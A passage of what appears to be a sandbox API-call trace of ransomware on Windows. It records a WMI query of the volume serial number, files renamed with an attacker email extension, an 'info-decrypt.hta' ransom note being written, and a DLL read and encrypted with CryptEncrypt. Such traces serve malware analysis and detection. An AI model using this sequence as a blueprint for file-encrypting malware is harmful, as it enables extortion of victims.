ppv=0x6d8eaf4*=0x6027760) returned 0x0 [0170.722] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6027760, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x6d8eb88 | out: ppNamespace=0x6d8eb88*=0x60330b4) returned 0x0 [0171.552] WbemLocator:IUnknown:QueryInterface (in: This=0x60330b4, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8ea24 | out: ppvObject=0x6d8ea24*=0xb5b314) returned 0x0 [0171.552] WbemLocator:IClientSecurity:QueryBlanket (in: This=0xb5b314, pProxy=0x60330b4, pAuthnSvc=0x6d8ea74, pAuthzSvc=0x6d8ea70, pServerPrincName=0x6d8ea68, pAuthnLevel=0x6d8ea6c, pImpLevel=0x6d8ea5c, pAuthInfo=0x6d8ea60, pCapabilites=0x6d8ea64 | out: pAuthnSvc=0x6d8ea74*=0xa, pAuthzSvc=0x6d8ea70*=0x0, pServerPrincName=0x6d8ea68, pAuthnLevel=0x6d8ea6c*=0x6, pImpLevel=0x6d8ea5c*=0x2, pAuthInfo=0x6d8ea60, pCapabilites=0x6d8ea64*=0x1) returned 0x0 [0171.552] WbemLocator:IUnknown:Release (This=0xb5b314) returned 0x1 [0171.552] WbemLocator:IUnknown:QueryInterface (in: This=0x60330b4, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8ea18 | out: ppvObject=0x6d8ea18*=0xb5b334) returned 0x0 [0171.552] WbemLocator:IUnknown:QueryInterface (in: This=0x60330b4, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8ea14 | out: ppvObject=0x6d8ea14*=0xb5b314) returned 0x0 [0171.553] WbemLocator:IClientSecurity:SetBlanket (This=0xb5b314, pProxy=0x60330b4, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0171.553] WbemLocator:IUnknown:Release (This=0xb5b314) returned 0x2 [0171.553] WbemLocator:IUnknown:Release (This=0xb5b334) returned 0x1 [0171.553] CoTaskMemFree (pv=0xbd4a08) [0171.553] WbemLocator:IUnknown:Release (This=0x6027760) returned 0x0 [0171.553] WbemLocator:IUnknown:QueryInterface (in: This=0x60330b4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e614 | out: ppvObject=0x6d8e614*=0xb5b334) returned 0x0 [0171.553] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b334, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6d8e5d0 | out: ppvObject=0x6d8e5d0*=0x0) returned 0x80004002 [0171.554] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b334, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6d8e3ec | out: ppvObject=0x6d8e3ec*=0x0) returned 0x80004002 [0171.554] WbemLocator:IUnknown:AddRef (This=0xb5b334) returned 0x3 [0171.554] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b334, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6d8df2c | out: ppvObject=0x6d8df2c*=0x0) returned 0x80004002 [0171.555] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b334, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6d8dedc | out: ppvObject=0x6d8dedc*=0x0) returned 0x80004002 [0171.556] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b334, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8dee8 | out: ppvObject=0x6d8dee8*=0xb5b294) returned 0x0 [0171.556] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0xb5b294, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6d8def0 | out: pCid=0x6d8def0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0171.556] WbemLocator:IUnknown:Release (This=0xb5b294) returned 0x3 [0171.556] CoGetContextToken (in: pToken=0x6d8df48 | out: pToken=0x6d8df48) returned 0x0 [0171.556] CoGetContextToken (in: pToken=0x6d8def8 | out: pToken=0x6d8def8) returned 0x0 [0171.556] CoGetContextToken (in: pToken=0x6d8e350 | out: pToken=0x6d8e350) returned 0x0 [0171.556] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b334, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e3e0 | out: ppvObject=0x6d8e3e0*=0xb5b31c) returned 0x0 [0171.556] WbemLocator:IRpcOptions:Query (in: This=0xb5b31c, pPrx=0xb5b334, dwProperty=2, pdwValue=0x6d8e408 | out: pdwValue=0x6d8e408) returned 0x80004002 [0171.556] WbemLocator:IUnknown:Release (This=0xb5b31c) returned 0x3 [0171.556] WbemLocator:IUnknown:Release (This=0xb5b334) returned 0x2 [0171.556] CoGetContextToken (in: pToken=0x6d8e928 | out: pToken=0x6d8e928) returned 0x0 [0171.556] CoGetContextToken (in: pToken=0x6d8e888 | out: pToken=0x6d8e888) returned 0x0 [0171.556] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b334, riid=0x6d8e958*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x6d8e954 | out: ppvObject=0x6d8e954*=0x60330b4) returned 0x0 [0171.556] WbemLocator:IUnknown:AddRef (This=0x60330b4) returned 0x4 [0171.557] WbemLocator:IUnknown:Release (This=0x60330b4) returned 0x3 [0171.557] WbemLocator:IUnknown:Release (This=0x60330b4) returned 0x2 [0171.557] SysStringLen (param_1=0x0) returned 0x0 [0171.557] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030da0, puCount=0x6d8ecec | out: puCount=0x6d8ecec*=0x0) returned 0x0 [0171.557] WbemDefPath:IWbemPath:GetText (in: This=0x6030da0, lFlags=2, puBuffLength=0x6d8ece8*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ece8*=0x20, pszText=0x0) returned 0x0 [0171.557] WbemDefPath:IWbemPath:GetText (in: This=0x6030da0, lFlags=2, puBuffLength=0x6d8ece8*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6d8ece8*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0171.557] CoGetContextToken (in: pToken=0x6d8e958 | out: pToken=0x6d8e958) returned 0x0 [0171.557] WbemLocator:IUnknown:AddRef (This=0xb5b334) returned 0x3 [0171.557] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b334, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e7ec | out: ppvObject=0x6d8e7ec*=0xb5b334) returned 0x0 [0171.557] WbemLocator:IUnknown:Release (This=0xb5b334) returned 0x3 [0171.557] WbemLocator:IUnknown:Release (This=0xb5b334) returned 0x2 [0171.557] WbemDefPath:IWbemPath:GetText (in: This=0x6030da0, lFlags=2, puBuffLength=0x6d8ecf0*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ecf0*=0x20, pszText=0x0) returned 0x0 [0171.557] WbemDefPath:IWbemPath:GetText (in: This=0x6030da0, lFlags=2, puBuffLength=0x6d8ecf0*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6d8ecf0*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0171.557] IWbemServices:GetObject (in: This=0x60330b4, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x6d8eca4*=0x0, ppCallResult=0x0 | out: ppObject=0x6d8eca4*=0x6027cb8, ppCallResult=0x0) returned 0x0 [0171.995] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030e10, puCount=0x6d8eca4 | out: puCount=0x6d8eca4*=0x2) returned 0x0 [0171.995] WbemDefPath:IWbemPath:GetText (in: This=0x6030e10, lFlags=4, puBuffLength=0x6d8eca0*=0x0, pszText=0x0 | out: puBuffLength=0x6d8eca0*=0xf, pszText=0x0) returned 0x0 [0171.995] WbemDefPath:IWbemPath:GetText (in: This=0x6030e10, lFlags=4, puBuffLength=0x6d8eca0*=0xf, pszText="00000000000000" | out: puBuffLength=0x6d8eca0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0171.995] IWbemClassObject:Get (in: This=0x6027cb8, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6d8eca0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x35e8eac*=0, plFlavor=0x35e8eb0*=0 | out: pVal=0x6d8eca0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x35e8eac*=8, plFlavor=0x35e8eb0*=0) returned 0x0 [0171.995] SysStringByteLen (bstr="9C354B42") returned 0x10 [0171.995] SysStringByteLen (bstr="9C354B42") returned 0x10 [0171.995] IWbemClassObject:Get (in: This=0x6027cb8, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6d8eca8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x35e8eac*=8, plFlavor=0x35e8eb0*=0 | out: pVal=0x6d8eca8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x35e8eac*=8, plFlavor=0x35e8eb0*=0) returned 0x0 [0171.995] SysStringByteLen (bstr="9C354B42") returned 0x10 [0171.995] SysStringByteLen (bstr="9C354B42") returned 0x10 [0171.995] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL", nBufferLength=0x105, lpBuffer=0x6d8e8a8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL", lpFilePart=0x0) returned 0x47 [0171.995] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL.id-9C354B42.[pewpew@TuTa.io].abkir", nBufferLength=0x105, lpBuffer=0x6d8e8a8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL.id-9C354B42.[pewpew@TuTa.io].abkir", lpFilePart=0x0) returned 0x6a [0171.996] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ed08) returned 1 [0171.996] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\1033\\eeintl.dll"), fInfoLevelId=0x0, lpFileInformation=0x6d8ed84 | out: lpFileInformation=0x6d8ed84*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x723f8e00, ftCreationTime.dwHighDateTime=0x1c2e156, ftLastAccessTime.dwLowDateTime=0xeed38550, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x218a5020, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x20)) returned 1 [0171.996] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ed04) returned 1 [0171.996] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\1033\\eeintl.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL.id-9C354B42.[pewpew@TuTa.io].abkir" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\1033\\eeintl.dll.id-9c354b42.[pewpew@tuta.io].abkir")) returned 1 [0171.997] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ee9c) returned 1 [0171.997] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO", nBufferLength=0x105, lpBuffer=0x6d8e9a4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO", lpFilePart=0x0) returned 0x33 [0171.997] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\", nBufferLength=0x105, lpBuffer=0x6d8e978, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\", lpFilePart=0x0) returned 0x34 [0171.997] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\*", lpFindFileData=0x6d8ebc4 | out: lpFindFileData=0x6d8ebc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x58c7d970, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x58c7d970, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x58c7d970, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f550 [0171.997] FindNextFileW (in: hFindFile=0xb7f550, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x58c7d970, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x58c7d970, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x58c7d970, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0171.998] FindNextFileW (in: hFindFile=0xb7f550, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b4ffc00, ftCreationTime.dwHighDateTime=0x1cac1f6, ftLastAccessTime.dwLowDateTime=0x58c7d970, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6b4ffc00, ftLastWriteTime.dwHighDateTime=0x1cac1f6, nFileSizeHigh=0x0, nFileSizeLow=0x7980, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSOEURO.DLL", cAlternateFileName="")) returned 1 [0171.998] FindNextFileW (in: hFindFile=0xb7f550, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0171.998] FindClose (in: hFindFile=0xb7f550 | out: hFindFile=0xb7f550) returned 1 [0171.998] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ee5c) returned 1 [0171.998] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ee68) returned 1 [0171.998] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ee9c) returned 1 [0171.998] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO", nBufferLength=0x105, lpBuffer=0x6d8e9a4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO", lpFilePart=0x0) returned 0x33 [0171.998] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\", nBufferLength=0x105, lpBuffer=0x6d8e978, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\", lpFilePart=0x0) returned 0x34 [0171.998] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\*", lpFindFileData=0x6d8ebc4 | out: lpFindFileData=0x6d8ebc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x58c7d970, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x58c7d970, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x58c7d970, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f550 [0171.998] FindNextFileW (in: hFindFile=0xb7f550, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x58c7d970, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x58c7d970, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x58c7d970, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0171.999] FindNextFileW (in: hFindFile=0xb7f550, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b4ffc00, ftCreationTime.dwHighDateTime=0x1cac1f6, ftLastAccessTime.dwLowDateTime=0x58c7d970, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6b4ffc00, ftLastWriteTime.dwHighDateTime=0x1cac1f6, nFileSizeHigh=0x0, nFileSizeLow=0x7980, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSOEURO.DLL", cAlternateFileName="")) returned 1 [0171.999] FindNextFileW (in: hFindFile=0xb7f550, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b4ffc00, ftCreationTime.dwHighDateTime=0x1cac1f6, ftLastAccessTime.dwLowDateTime=0x58c7d970, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6b4ffc00, ftLastWriteTime.dwHighDateTime=0x1cac1f6, nFileSizeHigh=0x0, nFileSizeLow=0x7980, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSOEURO.DLL", cAlternateFileName="")) returned 0 [0171.999] FindClose (in: hFindFile=0xb7f550 | out: hFindFile=0xb7f550) returned 1 [0171.999] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ee5c) returned 1 [0171.999] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ee68) returned 1 [0171.999] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL", nBufferLength=0x105, lpBuffer=0x6d8e910, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL", lpFilePart=0x0) returned 0x3f [0171.999] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6d8e918, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\info-decrypt.hta", lpFilePart=0x0) returned 0x44 [0171.999] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ed78) returned 1 [0171.999] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\info-decrypt.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\euro\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x6d8edf4 | out: lpFileInformation=0x6d8edf4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0171.999] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ed74) returned 1 [0171.999] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL", nBufferLength=0x105, lpBuffer=0x6d8e910, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL", lpFilePart=0x0) returned 0x3f [0171.999] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6d8e7b8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\info-decrypt.hta", lpFilePart=0x0) returned 0x44 [0171.999] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ecac) returned 1 [0172.000] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\info-decrypt.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\euro\\info-decrypt.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x5a0 [0172.000] GetFileType (hFile=0x5a0) returned 0x1 [0172.000] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8eca8) returned 1 [0172.000] GetFileType (hFile=0x5a0) returned 0x1 [0172.000] WriteFile (in: hFile=0x5a0, lpBuffer=0x36204d4*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6d8ed70, lpOverlapped=0x0 | out: lpBuffer=0x36204d4*, lpNumberOfBytesWritten=0x6d8ed70*=0x1000, lpOverlapped=0x0) returned 1 [0172.001] WriteFile (in: hFile=0x5a0, lpBuffer=0x36204d4*, nNumberOfBytesToWrite=0x55e, lpNumberOfBytesWritten=0x6d8ed44, lpOverlapped=0x0 | out: lpBuffer=0x36204d4*, lpNumberOfBytesWritten=0x6d8ed44*=0x55e, lpOverlapped=0x0) returned 1 [0172.001] CloseHandle (hObject=0x5a0) returned 1 [0172.001] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL", nBufferLength=0x105, lpBuffer=0x6d8e918, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL", lpFilePart=0x0) returned 0x3f [0172.001] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8edc4) returned 1 [0172.001] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\euro\\msoeuro.dll"), fInfoLevelId=0x0, lpFileInformation=0x36214f0 | out: lpFileInformation=0x36214f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b4ffc00, ftCreationTime.dwHighDateTime=0x1cac1f6, ftLastAccessTime.dwLowDateTime=0x58c7d970, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6b4ffc00, ftLastWriteTime.dwHighDateTime=0x1cac1f6, nFileSizeHigh=0x0, nFileSizeLow=0x7980)) returned 1 [0172.002] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8edc0) returned 1 [0172.002] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL", nBufferLength=0x105, lpBuffer=0x6d8e804, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL", lpFilePart=0x0) returned 0x3f [0172.002] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ecf8) returned 1 [0172.002] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\euro\\msoeuro.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x5a0 [0172.002] GetFileType (hFile=0x5a0) returned 0x1 [0172.002] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ecf4) returned 1 [0172.002] GetFileType (hFile=0x5a0) returned 0x1 [0172.002] GetFileSize (in: hFile=0x5a0, lpFileSizeHigh=0x6d8ee00 | out: lpFileSizeHigh=0x6d8ee00*=0x0) returned 0x7980 [0172.002] ReadFile (in: hFile=0x5a0, lpBuffer=0x36216e0, nNumberOfBytesToRead=0x7980, lpNumberOfBytesRead=0x6d8edac, lpOverlapped=0x0 | out: lpBuffer=0x36216e0*, lpNumberOfBytesRead=0x6d8edac*=0x7980, lpOverlapped=0x0) returned 1 [0172.039] CloseHandle (hObject=0x5a0) returned 1 [0172.039] CryptAcquireContextW (in: phProv=0x6d8ed4c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6d8ed4c*=0x66ba630) returned 1 [0172.040] CryptGenRandom (in: hProv=0x66ba630, dwLen=0x10, pbBuffer=0x36293b4 | out: pbBuffer=0x36293b4) returned 1 [0175.340] CryptImportKey (in: hProv=0x66ba630, pbData=0x36e91fc, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x6d8ed1c | out: phKey=0x6d8ed1c*=0xb7f110) returned 1 [0175.340] CryptContextAddRef (hProv=0x66ba630, pdwReserved=0x0, dwFlags=0x0) returned 1 [0175.341] CryptContextAddRef (hProv=0x66ba630, pdwReserved=0x0, dwFlags=0x0) returned 1 [0175.341] CryptDuplicateKey (in: hKey=0xb7f110, pdwReserved=0x0, dwFlags=0x0, phKey=0x6d8ed0c | out: phKey=0x6d8ed0c*=0xb7fb50) returned 1 [0175.341] CryptContextAddRef (hProv=0x66ba630, pdwReserved=0x0, dwFlags=0x0) returned 1 [0175.341] CryptSetKeyParam (hKey=0xb7fb50, dwParam=0x4, pbData=0x36e92dc*=0x1, dwFlags=0x0) returned 1 [0175.341] CryptSetKeyParam (hKey=0xb7fb50, dwParam=0x1, pbData=0x36e92a8, dwFlags=0x0) returned 1 [0175.341] CryptEncrypt (in: hKey=0xb7fb50, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x36e92ec*, pdwDataLen=0x6d8ed78*=0x7990, dwBufLen=0x7990 | out: pbData=0x36e92ec*, pdwDataLen=0x6d8ed78*=0x7990) returned 1 [0175.341] CryptEncrypt (in: hKey=0xb7fb50, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x36f0ca0*, pdwDataLen=0x6d8ed80*=0x0, dwBufLen=0x10 | out: pbData=0x36f0ca0*, pdwDataLen=0x6d8ed80*=0x10) returned 1 